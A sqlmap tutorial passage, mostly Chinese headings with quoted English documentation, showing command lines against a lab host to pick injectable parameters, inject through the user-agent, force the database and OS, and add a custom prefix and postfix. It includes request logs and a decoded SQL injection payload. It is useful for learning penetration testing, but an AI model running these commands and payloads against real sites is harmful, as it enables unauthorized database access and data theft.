绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 1 -p “id
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2″ -v 1 -p “cat,id”
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)”
指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL”
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server
指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows”
* Linux
* Windows
自定义payload
Options: –prefix and –postfix
In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.
Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “SELECT * FROM users WHERE id=(‘” . $_GET['id'] . “‘) LIMIT 0, 1″;:
$ python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1″ -v 3 -p “id” –prefix “‘” –postfix “AND ‘test’='test”
[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
[...]
As you can see, the injection payload for testing for custom injection is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which URL decoded is:
id=1′) AND 7433=7433 AND (‘test’='test
and makes the query syntatically correct to the page query:
SELECT * FROM users WHERE id=(’1′) AND 7433=7433 AND (‘test’='test’) LIMIT 0, 1
